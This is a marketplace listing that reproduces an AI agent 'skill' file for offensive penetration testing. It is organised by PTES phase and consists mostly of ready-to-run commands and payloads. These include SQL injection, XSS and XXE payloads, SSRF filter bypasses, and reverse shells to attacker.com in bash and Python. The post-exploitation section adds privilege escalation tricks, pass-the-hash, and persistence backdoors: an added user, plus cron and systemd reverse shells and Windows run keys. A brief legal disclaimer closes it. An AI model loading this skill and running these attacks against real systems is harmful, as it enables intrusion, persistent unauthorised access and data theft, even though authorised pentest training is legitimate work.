agentsclimarketplace

Penetration testing

Skill kinhluan/skills/.agent-skills/penetration-testing

πŸš€ Professional Multi-Agent Skills

Install
npx -y skills add kinhluan/skills --skill penetration-testing

Assembled from the repository path, not quoted from the project. Check it against their README if it does not work.

One thing to look at

  • 2 stars2 stars. Stars are a popularity signal and not a quality one, but at this level it is likely that nobody has read this closely except its author, and you would be relying on your own review.

What its author says it does

Copied from the file, not written here

Offensive security, penetration testing, and vulnerability exploitation. Use when conducting security assessments, red team exercises, web application pentesting, network exploitation, or learning ethical hacking techniques. Covers PTES methodology, reconnaissance, exploitation, post-exploitation, and reporting.

SKILL.md

10.6 KB, ~3.1k tokens by cl100k_base, as published. Nobody here has run it

Penetration Testing

Offensive security skill for ethical hacking, vulnerability exploitation, and security assessment. Covers the full penetration testing lifecycle from reconnaissance to reporting.

"The best defense is a good offense." β€” Know your enemy to protect yourself.


🎯 When to Use

  • Conducting security assessments or penetration tests
  • Learning ethical hacking techniques
  • Red team exercises
  • Bug bounty hunting
  • Vulnerability research and exploitation
  • Security awareness training

πŸ—ΊοΈ PTES Methodology Overview

Phase 1: Pre-Engagement Interactions
    └─ Scope definition, rules of engagement, legal agreements

Phase 2: Intelligence Gathering (Reconnaissance)
    └─ OSINT, passive/active recon, target enumeration

Phase 3: Threat Modeling
    └─ Identify high-value targets, attack vectors

Phase 4: Vulnerability Analysis
    └─ Automated scanning, manual verification

Phase 5: Exploitation
    └─ Gain access, prove impact

Phase 6: Post-Exploitation
    └─ Privilege escalation, lateral movement, persistence

Phase 7: Reporting
    └─ Executive summary, technical findings, remediation

πŸ” Phase 2: Reconnaissance

Passive Reconnaissance (OSINT)

# Subdomain enumeration
subfinder -d example.com -o subdomains.txt
amass enum -d example.com -o amass.txt
assetfinder --subs-only example.com

# DNS enumeration
dnsrecon -d example.com -t axfr
dnsenum example.com

# WHOIS & metadata
whois example.com
theHarvester -d example.com -b all

# GitHub recon (secrets, credentials)
git-dumper https://github.com/org/repo ./repo
truffleHog --regex --entropy=False https://github.com/org/repo

# Google dorks
site:example.com filetype:pdf
site:example.com intitle:"index of"
intext:"password" site:example.com

Active Reconnaissance

# Port scanning
nmap -sS -sV -O -p- --top-ports 1000 target.com
nmap -sV --script=vuln target.com

# Service enumeration
nmap -sV -p 80,443,8080 --script=http-enum target.com
nmap -sV -p 21,22,23,25,53,80,110,143,443,3306,3389,5432,8080 target.com

# Web technology detection
whatweb target.com
wappalyzer target.com

# Directory/file brute-forcing
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt -x php,txt,html
dirb http://target.com /usr/share/wordlists/dirb/common.txt
ffuf -u http://target.com/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt

πŸ”¬ Phase 4: Vulnerability Analysis

Web Application Scanning

# Automated scanning
nikto -h http://target.com
zaproxy -cmd -quickurl http://target.com -quickout report.html

# CMS scanning
wpscan --url http://target.com --enumerate ap,at,cb,dbe
joomscan -u http://target.com
droopescan scan drupal -u http://target.com

# SSL/TLS testing
sslscan target.com
testssl.sh target.com
nmap --script ssl-enum-ciphers -p 443 target.com

Manual Verification

# Check for common misconfigurations
curl -I http://target.com/robots.txt
curl -I http://target.com/.git/config
curl -I http://target.com/.env
curl -I http://target.com/backup.zip
curl -I http://target.com/phpinfo.php

# HTTP methods testing
curl -X OPTIONS http://target.com -i
curl -X PUT http://target.com/test.txt -d "test"

# CORS misconfiguration
curl -H "Origin: https://evil.com" -I http://target.com

πŸ’₯ Phase 5: Exploitation

SQL Injection

# Detection
sqlmap -u "http://target.com/page.php?id=1" --batch --level=2
sqlmap -u "http://target.com/page.php?id=1" --dbs --batch
sqlmap -u "http://target.com/page.php?id=1" -D database --tables --batch
sqlmap -u "http://target.com/page.php?id=1" -D database -T users --dump --batch

# Manual testing
# Error-based
' OR 1=1 -- -
" OR 1=1 -- -
') OR ('1'='1

# Union-based
' UNION SELECT null,null,null -- -
' UNION SELECT username,password,null FROM users -- -

# Blind (time-based)
' OR SLEEP(5) -- -
' OR pg_sleep(5) -- -

Cross-Site Scripting (XSS)

<!-- Reflected XSS -->
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>

<!-- Stored XSS -->
"><script>alert('XSS')</script>
'--><script>alert('XSS')</script>

<!-- DOM-based XSS -->
#<img src=x onerror=alert('XSS')>
javascript:alert('XSS')

<!-- Polyglot -->
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

Command Injection

# Basic detection
target.com/page?cmd=whoami
target.com/page?cmd=$(whoami)
target.com/page?cmd=`whoami`

# Reverse shell (if command injection confirmed)
bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("attacker.com",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

Server-Side Request Forgery (SSRF)

# Basic SSRF
curl http://target.com/fetch?url=http://169.254.169.254/latest/meta-data/
curl http://target.com/fetch?url=file:///etc/passwd

# Bypass filters
curl http://target.com/fetch?url=http://0177.0.0.1/
curl http://target.com/fetch?url=http://2130706433/
curl http://target.com/fetch?url=http://0x7f000001/

Local File Inclusion (LFI) / Remote File Inclusion (RFI)

# LFI
http://target.com/page?file=../../../etc/passwd
http://target.com/page?file=../../../../../../etc/passwd
http://target.com/page?file=php://filter/read=convert.base64-encode/resource=index.php

# RFI
http://target.com/page?file=http://attacker.com/shell.txt

XML External Entity (XXE)

<!-- Basic XXE -->
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>

<!-- OOB XXE -->
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://attacker.com/xxe.dtd">
%xxe;
]>
<foo>&data;</foo>

🏴 Phase 6: Post-Exploitation

Privilege Escalation (Linux)

# Information gathering
id
whoami
uname -a
cat /etc/os-release
find / -perm -4000 -type f 2>/dev/null  # SUID binaries
find / -perm -2000 -type f 2>/dev/null  # SGID binaries
cat /etc/sudoers
crontab -l

# Common exploits
# Kernel exploits
uname -r  # Check kernel version
searchsploit linux kernel $(uname -r)

# SUID exploitation
# If find has SUID: find . -exec /bin/sh -p \; -quit
# If vim has SUID: vim -c ':!/bin/sh'
# If less has SUID: less /etc/passwd -> !/bin/sh

# Sudo abuse
sudo -l
# If sudo allows specific commands without password
sudo -u#-1 /bin/bash  # CVE-2019-14287

# Capabilities
capsh --print
getcap -r / 2>/dev/null

Privilege Escalation (Windows)

# Information gathering
whoami /all
systeminfo
net user
net localgroup administrators
Get-Process
Get-Service

# Common exploits
# Unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\Windows\\" | findstr /i /v """
# If path has spaces and no quotes: C:\Program Files\Vuln Service\service.exe
# Place payload at C:\Program.exe

# AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# If enabled: msiexec /quiet /qn /i C:\Users\Public\payload.msi

# Potato family exploits (NTLM relay)
# JuicyPotato, RoguePotato, SweetPotato

Lateral Movement

# Pass-the-hash (PTH)
pth-smbclient -U user%hash //target/share
pth-winexe -U user%hash //target cmd

# Pass-the-ticket (PTT)
# Extract ticket with Mimikatz, inject with Rubeus

# SSH key pivoting
# If you find private keys: ssh -i id_rsa user@target

# Port forwarding
ssh -L 8080:internal-target:80 user@pivot-host
ssh -D 1080 user@pivot-host  # SOCKS proxy

Persistence

# Linux
# Add user
useradd -m -s /bin/bash backdoor
passwd backdoor

# SSH key
mkdir -p /root/.ssh
echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keys

# Cron job
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'" | crontab -

# Systemd service
cat > /etc/systemd/system/backdoor.service << EOF
[Unit]
Description=Backdoor

[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'
Restart=always

[Install]
WantedBy=multi-user.target
EOF
systemctl enable backdoor

# Windows
# Registry run key
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "C:\backdoor.exe" /f

# Scheduled task
schtasks /create /tn "Backdoor" /tr "C:\backdoor.exe" /sc minute /mo 1

# WMI persistence
# Use PowerShell Empire or Cobalt Strike for WMI events

πŸ“Š Phase 7: Reporting

Report Structure

1. Executive Summary
   - Risk rating (Critical/High/Medium/Low)
   - Business impact
   - Key recommendations

2. Technical Findings
   For each vulnerability:
   - Title & Severity (CVSS v3.1)
   - Description
   - Proof of Concept (PoC)
   - Impact
   - Remediation

3. Appendices
   - Tools used
   - Scope & methodology
   - Test timeline

CVSS v3.1 Scoring

SeverityScore RangeResponse Time
Critical9.0-10.0Immediate
High7.0-8.930 days
Medium4.0-6.960 days
Low0.1-3.990 days

πŸ› οΈ Essential Tools

CategoryTools
Reconsubfinder, amass, theHarvester, dnsrecon, whois
Scanningnmap, masscan, rustscan
WebBurp Suite, ZAP, nikto, gobuster, ffuf, sqlmap
ExploitationMetasploit, Cobalt Strike, Sliver
Post-ExploitationMimikatz, Rubeus, BloodHound, SharpHound
ReportingDradis, Faraday, DefectDojo

⚠️ Legal & Ethical Guidelines

  • Always have written authorization before testing
  • Never test systems you don't own or have permission to test
  • Minimize impact on target systems
  • Report findings responsibly
  • Destroy all data collected after engagement

πŸ“š References

What ships with it: 1 file

558 B alongside SKILL.md

Keep looking

Skills are one crate of 326,970. Ordering is by how many stacks a row turns up in, so the top of any crate is what has actually been picked rather than what has the most stars.